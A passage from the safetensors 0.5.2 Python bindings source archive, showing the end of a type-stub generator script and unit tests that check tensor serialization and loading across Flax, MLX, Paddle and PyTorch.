f"\n{indent}") def function(obj, indent, text_signature=None): if text_signature is None: text_signature = obj.__text_signature__ string = "" string += f"{indent}def {obj.__name__}{text_signature}:\n" indent += INDENT string += f'{indent}"""\n' string += f"{indent}{do_indent(obj.__doc__, indent)}\n" string += f'{indent}"""\n' string += f"{indent}pass\n" string += "\n" string += "\n" return string def member_sort(member): if inspect.isclass(member): value = 10 + len(inspect.getmro(member)) else: value = 1 return value def fn_predicate(obj): value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj) if value: return ( obj.__doc__ and obj.__text_signature__ and (not obj.__name__.startswith("_") or obj.__name__ in {"__enter__", "__exit__"}) ) if inspect.isgetsetdescriptor(obj): return obj.__doc__ and not obj.__name__.startswith("_") return False def get_module_members(module): members = [ member for name, member in inspect.getmembers(module) if not name.startswith("_") and not inspect.ismodule(member) ] members.sort(key=member_sort) return members def pyi_file(obj, indent=""): string = "" if inspect.ismodule(obj): string += GENERATED_COMMENT members = get_module_members(obj) for member in members: string += pyi_file(member, indent) elif inspect.isclass(obj): indent += INDENT mro = inspect.getmro(obj) if len(mro) > 2: inherit = f"({mro[1].__name__})" else: inherit = "" string += f"class {obj.__name__}{inherit}:\n" body = "" if obj.__doc__: body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n' fns = inspect.getmembers(obj, fn_predicate) # Init if obj.__text_signature__: signature = obj.__text_signature__.replace("(", "(self, ") body += f"{indent}def __init__{signature}:\n" body += f"{indent+INDENT}pass\n" body += "\n" for name, fn in fns: body += pyi_file(fn, indent=indent) if not body: body += f"{indent}pass\n" string += body string += "\n\n" elif inspect.isbuiltin(obj): string += f"{indent}@staticmethod\n" string += function(obj, indent) elif inspect.ismethoddescriptor(obj): string += function(obj, indent) elif inspect.isgetsetdescriptor(obj): # TODO it would be interesing to add the setter maybe ? string += f"{indent}@property\n" string += function(obj, indent, text_signature="(self)") else: raise Exception(f"Object {obj} is not supported") return string def py_file(module, origin): members = get_module_members(module) string = GENERATED_COMMENT string += f"from .. import {origin}\n" string += "\n" for member in members: name = member.__name__ string += f"{name} = {origin}.{name}\n" return string def do_black(content, is_pyi): mode = black.Mode( target_versions={black.TargetVersion.PY35}, line_length=119, is_pyi=is_pyi, string_normalization=True, experimental_string_processing=False, ) try: content = content.replace("$self", "self") return black.format_file_contents(content, fast=True, mode=mode) except black.NothingChanged: return content def write(module, directory, origin, check=False): submodules = [(name, member) for name, member in inspect.getmembers(module) if inspect.ismodule(member)] filename = os.path.join(directory, "__init__.pyi") pyi_content = pyi_file(module) pyi_content = do_black(pyi_content, is_pyi=True) os.makedirs(directory, exist_ok=True) if check: with open(filename, "r") as f: data = f.read() assert data == pyi_content, f"The content of {filename} seems outdated, please run `python stub.py`" else: with open(filename, "w") as f: f.write(pyi_content) filename = os.path.join(directory, "__init__.py") py_content = py_file(module, origin) py_content = do_black(py_content, is_pyi=False) os.makedirs(directory, exist_ok=True) is_auto = False if not os.path.exists(filename): is_auto = True else: with open(filename, "r") as f: line = f.readline() if line == GENERATED_COMMENT: is_auto = True if is_auto: if check: with open(filename, "r") as f: data = f.read() assert data == py_content, f"The content of {filename} seems outdated, please run `python stub.py`" else: with open(filename, "w") as f: f.write(py_content) for name, submodule in submodules: write(submodule, os.path.join(directory, name), f"{name}", check=check) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--check", action="store_true") args = parser.parse_args() import safetensors write( safetensors._safetensors_rust, "py_src/safetensors/", "safetensors", check=args.check, ) safetensors-0.5.2/bindings/python/tests/000077500000000000000000000000001473753372300203505ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/tests/data/000077500000000000000000000000001473753372300212615ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/tests/data/__init__.py000066400000000000000000000000001473753372300233600ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/tests/test_flax_comparison.py000066400000000000000000000044621473753372300251530ustar00rootroot00000000000000import platform import unittest if platform.system() != "Windows": # This platform is not supported, we don't want to crash on import # This test will be skipped anyway. import jax.numpy as jnp from jax import random from flax.serialization import msgpack_restore, msgpack_serialize from safetensors import safe_open from safetensors.flax import load_file, save_file # Jax doesn't not exist on Windows @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows") class LoadTestCase(unittest.TestCase): def setUp(self): key = random.key(0) data = { "test": random.normal(key, (1024, 1024), dtype=jnp.float32), "test2": random.normal(key, (1024, 1024), dtype=jnp.float16), "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16), } self.flax_filename = "./tests/data/flax_load.msgpack" self.sf_filename = "./tests/data/flax_load.safetensors" serialized = msgpack_serialize(data) with open(self.flax_filename, "wb") as f: f.write(serialized) save_file(data, self.sf_filename) def test_zero_sized(self): data = { "test": jnp.zeros((2, 0), dtype=jnp.float32), } local = "./tests/data/out_safe_flat_mmap_small2.safetensors" save_file(data.copy(), local) reloaded = load_file(local) # Empty tensor != empty tensor on numpy, so comparing shapes # instead self.assertEqual(data["test"].shape, reloaded["test"].shape) def test_deserialization_safe(self): weights = load_file(self.sf_filename) with open(self.flax_filename, "rb") as f: data = f.read() flax_weights = msgpack_restore(data) for k, v in weights.items(): tv = flax_weights[k] self.assertTrue(jnp.allclose(v, tv)) def test_deserialization_safe_open(self): weights = {} with safe_open(self.sf_filename, framework="flax") as f: for k in f.keys(): weights[k] = f.get_tensor(k) with open(self.flax_filename, "rb") as f: data = f.read() flax_weights = msgpack_restore(data) for k, v in weights.items(): tv = flax_weights[k] self.assertTrue(jnp.allclose(v, tv)) safetensors-0.5.2/bindings/python/tests/test_mlx_comparison.py000066400000000000000000000044621473753372300250210ustar00rootroot00000000000000import platform import unittest HAS_MLX = False if platform.system() == "Darwin": # This platform is not supported, we don't want to crash on import # This test will be skipped anyway. try: import mlx.core as mx HAS_MLX = True except ImportError: pass if HAS_MLX: from safetensors import safe_open from safetensors.mlx import load_file, save_file # MLX only exists on Mac @unittest.skipIf(platform.system() != "Darwin", "Mlx is not available on non Mac") @unittest.skipIf(not HAS_MLX, "Mlx is not available.") class LoadTestCase(unittest.TestCase): def setUp(self): data = { "test": mx.randn((1024, 1024), dtype=mx.float32), "test2": mx.randn((1024, 1024), dtype=mx.float32), "test3": mx.randn((1024, 1024), dtype=mx.float32), # This doesn't work because bfloat16 is not implemented # with similar workarounds as jax/tensorflow. # https://github.com/ml-explore/mlx/issues/1296 # "test4": mx.randn((1024, 1024), dtype=mx.bfloat16), } self.mlx_filename = "./tests/data/mlx_load.npz" self.sf_filename = "./tests/data/mlx_load.safetensors" mx.savez(self.mlx_filename, **data) save_file(data, self.sf_filename) def test_zero_sized(self): data = { "test": mx.zeros((2, 0), dtype=mx.float32), } local = "./tests/data/out_safe_flat_mmap_small2.safetensors" save_file(data.copy(), local) reloaded = load_file(local) # Empty tensor != empty tensor on numpy, so comparing shapes # instead self.assertEqual(data["test"].shape, reloaded["test"].shape) def test_deserialization_safe(self): weights = load_file(self.sf_filename) mlx_weights = mx.load(self.mlx_filename) for k, v in weights.items(): tv = mlx_weights[k] self.assertTrue(mx.allclose(v, tv)) def test_deserialization_safe_open(self): weights = {} with safe_open(self.sf_filename, framework="mlx") as f: for k in f.keys(): weights[k] = f.get_tensor(k) mlx_weights = mx.load(self.mlx_filename) for k, v in weights.items(): tv = mlx_weights[k] self.assertTrue(mx.allclose(v, tv)) safetensors-0.5.2/bindings/python/tests/test_paddle_comparison.py000066400000000000000000000027241473753372300254510ustar00rootroot00000000000000import unittest import numpy as np try: import paddle from safetensors.paddle import load_file, save_file HAS_PADDLE = True except ImportError: HAS_PADDLE = False @unittest.skipIf(not HAS_PADDLE, "Paddle is not available") class SafeTestCase(unittest.TestCase): def setUp(self): data = { "test": paddle.zeros((1024, 1024), dtype=paddle.float32), "test2": paddle.zeros((1024, 1024), dtype=paddle.float32), "test3": paddle.zeros((1024, 1024), dtype=paddle.float32), } self.paddle_filename = "./tests/data/paddle_load.pdparams" self.sf_filename = "./tests/data/paddle_load.safetensors" paddle.save(data, self.paddle_filename) save_file(data, self.sf_filename) @unittest.expectedFailure def test_zero_sized(self): # This fails because paddle wants initialized tensor before # sending to numpy data = { "test": paddle.zeros((2, 0), dtype=paddle.float32), } local = "./tests/data/out_safe_paddle_mmap_small2.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(paddle.equal(data["test"], reloaded["test"])) def test_deserialization_safe(self): weights = load_file(self.sf_filename) paddle_weights = paddle.load(self.paddle_filename) for k, v in weights.items(): tv = paddle_weights[k] self.assertTrue(np.allclose(v, tv)) safetensors-0.5.2/bindings/python/tests/test_pt_comparison.py000066400000000000000000000315731473753372300246470ustar00rootroot00000000000000import sys import unittest import torch from safetensors import safe_open from safetensors.torch import load, load_file, save, save_file try: import torch_npu # noqa npu_present = True except Exception: npu_present = False class TorchTestCase(unittest.TestCase): def test_serialization(self): data = torch.zeros((2, 2), dtype=torch.int32) out = save({"test": data}) self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) save_file({"test": data}, "serialization.safetensors") out = open("serialization.safetensors", "rb").read() self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) data[1, 1] = 1 out = save({"test": data}) self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", ) save_file({"test": data}, "serialization.safetensors") out = open("serialization.safetensors", "rb").read() self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", ) data = torch.ones((2, 2), dtype=torch.bfloat16) data[0, 0] = 2.25 out = save({"test": data}) self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"BF16","shape":[2,2],"data_offsets":[0,8]}} \x10@\x80?\x80?\x80?', ) def test_odd_dtype(self): data = { "test": torch.randn((2, 2), dtype=torch.bfloat16), "test2": torch.randn((2, 2), dtype=torch.float16), "test3": torch.zeros((2, 2), dtype=torch.bool), } # Modify bool to have both values. data["test3"][0, 0] = True local = "./tests/data/out_safe_pt_mmap_small.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(torch.equal(data["test"], reloaded["test"])) self.assertTrue(torch.equal(data["test2"], reloaded["test2"])) self.assertTrue(torch.equal(data["test3"], reloaded["test3"])) def test_odd_dtype_fp8(self): if torch.__version__ < "2.1": return # torch.float8 requires 2.1 data = { "test1": torch.tensor([-0.5], dtype=torch.float8_e4m3fn), "test2": torch.tensor([-0.5], dtype=torch.float8_e5m2), } local = "./tests/data/out_safe_pt_mmap_small.safetensors" save_file(data, local) reloaded = load_file(local) # note: PyTorch doesn't implement torch.equal for float8 so we just compare the single element self.assertEqual(reloaded["test1"].dtype, torch.float8_e4m3fn) self.assertEqual(reloaded["test1"].item(), -0.5) self.assertEqual(reloaded["test2"].dtype, torch.float8_e5m2) self.assertEqual(reloaded["test2"].item(), -0.5) def test_zero_sized(self): data = { "test": torch.zeros((2, 0), dtype=torch.float), } local = "./tests/data/out_safe_pt_mmap_small2.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(torch.equal(data["test"], reloaded["test"])) reloaded = load(open(local, "rb").read()) self.assertTrue(torch.equal(data["test"], reloaded["test"])) def test_multiple_zero_sized(self): data = { "test": torch.zeros((2, 0), dtype=torch.float), "test2": torch.zeros((2, 0), dtype=torch.float), } local = "./tests/data/out_safe_pt_mmap_small3.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(torch.equal(data["test"], reloaded["test"])) self.assertTrue(torch.equal(data["test2"], reloaded["test2"])) def test_disjoint_tensors_shared_storage(self): A = torch.zeros((10, 10)) data = { "test": A[1:], "test2": A[:1], } local = "./tests/data/out_safe_pt_mmap_small4.safetensors" save_file(data, local) def test_meta_tensor(self): A = torch.zeros((10, 10), device=torch.device("meta")) data = { "test": A, } local = "./tests/data/out_safe_pt_mmap_small5.safetensors" with self.assertRaises(RuntimeError) as ex: save_file(data, local) self.assertIn("Cannot copy out of meta tensor", str(ex.exception)) def test_in_memory(self): data = { "test": torch.zeros((2, 2), dtype=torch.float32), } binary = save(data) self.assertEqual( binary, # Spaces are for forcing the alignment. b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"F32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) reloaded = load(binary) self.assertTrue(torch.equal(data["test"], reloaded["test"])) @unittest.skipIf(not torch.cuda.is_available(), "Cuda is not available") def test_gpu(self): data = { "test": torch.arange(4).view((2, 2)).to("cuda:0"), } local = "./tests/data/out_safe_pt_mmap_small.safetensors" save_file(data, local) reloaded = load_file(local) self.assertTrue(torch.equal(torch.arange(4).view((2, 2)), reloaded["test"])) @unittest.skipIf(not npu_present, "Npu is not available") def test_npu(self): data = { "test1": torch.zeros((2, 2), dtype=torch.float32).to("npu:0"), "test2": torch.zeros((2, 2), dtype=torch.float16).to("npu:0"), } local = "./tests/data/out_safe_pt_mmap_small_npu.safetensors" save_file(data, local) reloaded = load_file(local, device="npu:0") for k, v in reloaded.items(): self.assertTrue(torch.allclose(data[k], reloaded[k])) @unittest.skipIf(not torch.cuda.is_available(), "Cuda is not available") def test_anonymous_accelerator(self): data = { "test1": torch.zeros((2, 2), dtype=torch.float32).to(device=0), "test2": torch.zeros((2, 2), dtype=torch.float16).to(device=0), } local = "./tests/data/out_safe_pt_mmap_small_anonymous.safetensors" save_file(data, local) reloaded = load_file(local, device=0) for k, v in reloaded.items(): self.assertTrue(torch.allclose(data[k], reloaded[k])) def test_sparse(self): data = {"test": torch.sparse_coo_tensor(size=(2, 3))} local = "./tests/data/out_safe_pt_sparse.safetensors" with self.assertRaises(ValueError) as ctx: save_file(data, local) self.assertEqual( str(ctx.exception), "You are trying to save a sparse tensors: `['test']` which this library does not support. You can make it" " a dense tensor before saving with `.to_dense()` but be aware this might make a much larger file than" " needed.", ) def test_bogus(self): data = {"test": {"some": "thing"}} local = "./tests/data/out_safe_pt_sparse.safetensors" with self.assertRaises(ValueError) as ctx: save_file(data, local) self.assertEqual( str(ctx.exception), "Key `test` is invalid, expected torch.Tensor but received ", ) with self.assertRaises(ValueError) as ctx: save_file("notadict", local) self.assertEqual( str(ctx.exception), "Expected a dict of [str, torch.Tensor] but received ", ) class LoadTestCase(unittest.TestCase): def setUp(self): data = { "test": torch.zeros((1024, 1024), dtype=torch.float32), "test2": torch.zeros((1024, 1024), dtype=torch.float32), "test3": torch.zeros((1024, 1024), dtype=torch.float32), } self.pt_filename = "./tests/data/pt_load.pt" self.sf_filename = "./tests/data/pt_load.safetensors" with open(self.pt_filename, "wb") as f: torch.save(data, f) save_file(data, self.sf_filename) def test_deserialization_safe(self): tweights = torch.load(self.pt_filename) weights = load_file(self.sf_filename) for k, v in weights.items(): tv = tweights[k] self.assertTrue(torch.allclose(v, tv)) self.assertEqual(v.device, torch.device("cpu")) @unittest.skipIf(not torch.cuda.is_available(), "Cuda is not available") def test_deserialization_safe_gpu(self): # First time to hit disk tweights = torch.load(self.pt_filename, map_location="cuda:0") load_file(self.sf_filename, device=0) weights = load_file(self.sf_filename, device="cuda:0") for k, v in weights.items(): tv = tweights[k] self.assertTrue(torch.allclose(v, tv)) self.assertEqual(v.device, torch.device("cuda:0")) @unittest.skipIf(not torch.cuda.is_available(), "Cuda is not available") def test_deserialization_safe_gpu_slice(self): weights = {} with safe_open(self.sf_filename, framework="pt", device="cuda:0") as f: for k in f.keys(): weights[k] = f.get_slice(k)[:1] tweights = torch.load(self.pt_filename, map_location="cuda:0") tweights = {k: v[:1] for k, v in tweights.items()} for k, v in weights.items(): tv = tweights[k] self.assertTrue(torch.allclose(v, tv)) self.assertEqual(v.device, torch.device("cuda:0")) @unittest.skipIf(torch.cuda.device_count() < 2, "Only 1 device available") def test_deserialization_safe_device_1(self): load_file(self.sf_filename, device=1) weights = load_file(self.sf_filename, device="cuda:1") tweights = torch.load(self.pt_filename, map_location="cuda:1") for k, v in weights.items(): tv = tweights[k] self.assertTrue(torch.allclose(v, tv)) self.assertEqual(v.device, torch.device("cuda:1")) class SliceTestCase(unittest.TestCase): def setUp(self): self.tensor = torch.arange(6, dtype=torch.float32).reshape((1, 2, 3)) self.data = {"test": self.tensor} self.local = "./tests/data/out_safe_pt_mmap_slice.safetensors" # Need to copy since that call mutates the tensors to numpy save_file(self.data.copy(), self.local) def test_cannot_serialize_a_non_contiguous_tensor(self): tensor = torch.arange(6, dtype=torch.float32).reshape((1, 2, 3)) x = tensor[:, :, 1] data = {"test": x} self.assertFalse( x.is_contiguous(), ) with self.assertRaises(ValueError): save_file(data, "./tests/data/out.safetensors") def test_cannot_serialize_shared(self): A = torch.arange(6, dtype=torch.float32).reshape((2, 3)) B = A[:1] data = {"A": A, "B": B} with self.assertRaises(RuntimeError): save_file(data, "./tests/data/out.safetensors") B = A[1:] data = {"A": A, "B": B} with self.assertRaises(RuntimeError): save_file(data, "./tests/data/out.safetensors") def test_deserialization_slice(self): with safe_open(self.local, framework="pt") as f: _slice = f.get_slice("test") self.assertEqual(_slice.get_shape(), [1, 2, 3]) self.assertEqual(_slice.get_dtype(), "F32") tensor = _slice[:, :, 1:2] self.assertTrue(torch.equal(tensor, torch.Tensor([[[1.0], [4.0]]]))) self.assertTrue(torch.equal(tensor, self.tensor[:, :, 1:2])) buffer = tensor.numpy() if sys.byteorder == "big": buffer.byteswap(inplace=True) buffer = buffer.tobytes() self.assertEqual( buffer, b"\x00\x00\x80?\x00\x00\x80@", ) def test_deserialization_metadata(self): with safe_open(self.local, framework="pt") as f: metadata = f.metadata() self.assertEqual(metadata, None) # Save another one *with* metadata tensor = torch.arange(6, dtype=torch.float32).reshape((1, 2, 3)) data = {"test": tensor} local = "./tests/data/out_safe_pt_mmap2.safetensors" # Need to copy since that call mutates the tensors to numpy save_file(data, local, metadata={"Something": "more"}) with safe_open(local, framework="pt") as f: metadata = f.metadata() self.assertEqual(metadata, {"Something": "more"}) safetensors-0.5.2/bindings/python/tests/test_pt_model.py000066400000000000000000000237231473753372300235730ustar00rootroot00000000000000import copy import unittest import torch from safetensors import safe_open from safetensors.torch import ( _end_ptr, _find_shared_tensors, _is_complete, _remove_duplicate_names, load_model, save_file, save_model, ) class OnesModel(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(4, 4) self.a.weight = torch.nn.Parameter(torch.ones((4, 4))) self.a.bias = torch.nn.Parameter(torch.ones((4,))) self.b = self.a class Model(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(100, 100) self.b = self.a class NonContiguousModel(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(100, 100) A = torch.zeros((100, 100)) A = A.transpose(0, 1) self.a.weight = torch.nn.Parameter(A) class CopyModel(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(100, 100) self.b = copy.deepcopy(self.a) class NoSharedModel(torch.nn.Module): def __init__(self): super().__init__() self.a = torch.nn.Linear(100, 100) self.b = torch.nn.Linear(100, 100) class TorchModelTestCase(unittest.TestCase): def test_is_complete(self): A = torch.zeros((3, 3)) self.assertTrue(_is_complete(A)) B = A[:1, :] self.assertFalse(_is_complete(B)) # Covers the whole storage but with holes C = A[::2, :] self.assertFalse(_is_complete(C)) D = torch.zeros((2, 2), device=torch.device("meta")) self.assertTrue(_is_complete(D)) def test_find_shared_tensors(self): A = torch.zeros((3, 3)) B = A[:1, :] self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}]) self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}]) self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}]) C = torch.zeros((2, 2), device=torch.device("meta")) D = C[:1] # Meta device is not shared self.assertEqual(_find_shared_tensors({"C": C, "D": D}), []) self.assertEqual(_find_shared_tensors({"C": C}), []) self.assertEqual(_find_shared_tensors({"D": D}), []) def test_find_shared_non_shared_tensors(self): A = torch.zeros((4,)) B = A[:2] C = A[2:] # Shared storage but do not overlap self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}]) B = A[:2] C = A[1:] # Shared storage but *do* overlap self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}]) B = A[:2] C = A[2:] D = A[:1] # Shared storage but *do* overlap self.assertEqual(_find_shared_tensors({"B": B, "C": C, "D": D}), [{"B", "D"}, {"C"}]) def test_end_ptr(self): A = torch.zeros((4,)) start = A.data_ptr() end = _end_ptr(A) self.assertEqual(end - start, 16) B = torch.zeros((16,)) A = B[::4] start = A.data_ptr() end = _end_ptr(A) # Jump 3 times 16 byes (the stride of B) # Then add the size of the datapoint 4 bytes self.assertEqual(end - start, 16 * 3 + 4) # FLOAT16 A = torch.zeros((4,), dtype=torch.float16) start = A.data_ptr() end = _end_ptr(A) self.assertEqual(end - start, 8) B = torch.zeros((16,), dtype=torch.float16) A = B[::4] start = A.data_ptr() end = _end_ptr(A) # Jump 3 times 8 bytes (the stride of B) # Then add the size of the datapoint 4 bytes self.assertEqual(end - start, 8 * 3 + 2) def test_remove_duplicate_names(self): A = torch.zeros((3, 3)) B = A[:1, :] self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]}) self.assertEqual(_remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]}) with self.assertRaises(RuntimeError): self.assertEqual(_remove_duplicate_names({"B": B}), []) def test_failure(self): model = Model() with self.assertRaises(RuntimeError): save_file(model.state_dict(), "tmp.safetensors") # def test_workaround_refuse(self): # model = Model() # A = torch.zeros((1000, 10)) # a = A[:100, :] # model.a.weight = torch.nn.Parameter(a) # with self.assertRaises(RuntimeError) as ctx: # save_model(model, "tmp4.safetensors") # self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception)) def test_save(self): # Just testing the actual saved file to make sure we're ok on big endian model = OnesModel() save_model(model, "tmp_ones.safetensors") with safe_open("tmp_ones.safetensors", framework="pt") as f: self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) # 192 hardcoded to skip the header, metadata order is random. self.assertEqual( open("tmp_ones.safetensors", "rb").read()[192:], b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""", ) model2 = OnesModel() load_model(model2, "tmp_ones.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_workaround(self): model = Model() save_model(model, "tmp.safetensors") with safe_open("tmp.safetensors", framework="pt") as f: self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) model2 = Model() load_model(model2, "tmp.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_workaround_works_with_different_on_file_names(self): model = Model() state_dict = model.state_dict() state_dict.pop("a.weight") state_dict.pop("a.bias") save_file(state_dict, "tmp.safetensors") model2 = Model() load_model(model2, "tmp.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_workaround_non_contiguous(self): model = NonContiguousModel() with self.assertRaises(ValueError) as ctx: save_model(model, "tmp_c.safetensors", force_contiguous=False) self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception)) save_model(model, "tmp_c.safetensors", force_contiguous=True) model2 = NonContiguousModel() load_model(model2, "tmp_c.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_workaround_copy(self): model = CopyModel() self.assertEqual( _find_shared_tensors(model.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}] ) save_model(model, "tmp.safetensors") model2 = CopyModel() load_model(model2, "tmp.safetensors") state_dict = model.state_dict() for k, v in model2.state_dict().items(): torch.testing.assert_close(v, state_dict[k]) def test_difference_with_torch(self): model = Model() torch.save(model.state_dict(), "tmp2.bin") model2 = NoSharedModel() # This passes on torch. # The tensors are shared on disk, they are *not* shared within the model # The model happily loads the tensors, and ends up *not* sharing the tensors by. # doing copies self.assertEqual( _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}] ) model2.load_state_dict(torch.load("tmp2.bin")) self.assertEqual( _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}] ) # However safetensors cannot save those, so we cannot # reload the saved file with the different model save_model(model, "tmp2.safetensors") with self.assertRaises(RuntimeError) as ctx: load_model(model2, "tmp2.safetensors") self.assertIn("""Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception)) def test_difference_torch_odd(self): model = NoSharedModel() a = model.a.weight b = model.b.weight self.assertNotEqual(a.data_ptr(), b.data_ptr()) torch.save(model.state_dict(), "tmp3.bin") model2 = Model() self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}]) # Torch will affect either `b` or `a` to the shared tensor in the `model2` model2.load_state_dict(torch.load("tmp3.bin")) # XXX: model2 uses only the B weight not the A weight anymore. self.assertFalse(torch.allclose(model2.a.weight, model.a.weight)) torch.testing.assert_close(model2.a.weight, model.b.weight) self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}]) # Everything is saved as-is save_model(model, "tmp3.safetensors") # safetensors will yell that there were 2 tensors on disk, while # the models expects only 1 tensor since both are shared. with self.assertRaises(RuntimeError) as ctx: load_model(model2, "tmp3.safetensors") # Safetensors properly warns the user that some ke self.assertIn("""Unexpected key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception)) safetensors-0.5.2/bindings/python/tests/test_simple.py000066400000000000000000000317271473753372300232640ustar00rootroot00000000000000import os import tempfile import unittest from pathlib import Path import numpy as np import torch from safetensors import SafetensorError, safe_open, serialize from safetensors.numpy import load, load_file, save, save_file from safetensors.torch import _find_shared_tensors from safetensors.torch import load_file as load_file_pt from safetensors.torch import save_file as save_file_pt from safetensors.torch import storage_ptr, storage_size class TestCase(unittest.TestCase): def test_serialization(self): data = np.zeros((2, 2), dtype=np.int32) out = save({"test": data}) self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) save_file({"test": data}, "serialization.safetensors") out = open("serialization.safetensors", "rb").read() self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", ) data[1, 1] = 1 out = save({"test": data}) self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", ) save_file({"test": data}, "serialization.safetensors") out = open("serialization.safetensors", "rb").read() self.assertEqual( out, b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}} ' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", ) def test_deserialization(self): serialized = b"""<\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""" out = load(serialized) self.assertEqual(list(out.keys()), ["test"]) np.testing.assert_array_equal(out["test"], np.zeros((2, 2), dtype=np.int32)) def test_deserialization_metadata(self): serialized = ( b'f\x00\x00\x00\x00\x00\x00\x00{"__metadata__":{"framework":"pt"},"test1":{"dtype":"I32","shape":[2,2],"data_offsets":[0,16]}}' b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" ) with tempfile.NamedTemporaryFile() as f: f.write(serialized) f.seek(0) with safe_open(f.name, framework="np") as g: self.assertEqual(g.metadata(), {"framework": "pt"}) def test_serialization_order_invariant(self): data = np.zeros((2, 2), dtype=np.int32) out1 = save({"test1": data, "test2": data}) out2 = save({"test2": data, "test1": data}) self.assertEqual(out1, out2) def test_serialization_forces_alignment(self): data = np.zeros((2, 2), dtype=np.int32) data2 = np.zeros((2, 2), dtype=np.float16) out1 = save({"test1": data, "test2": data2}) out2 = save({"test2": data2, "test1": data}) self.assertEqual(out1, out2) self.assertEqual( out1, 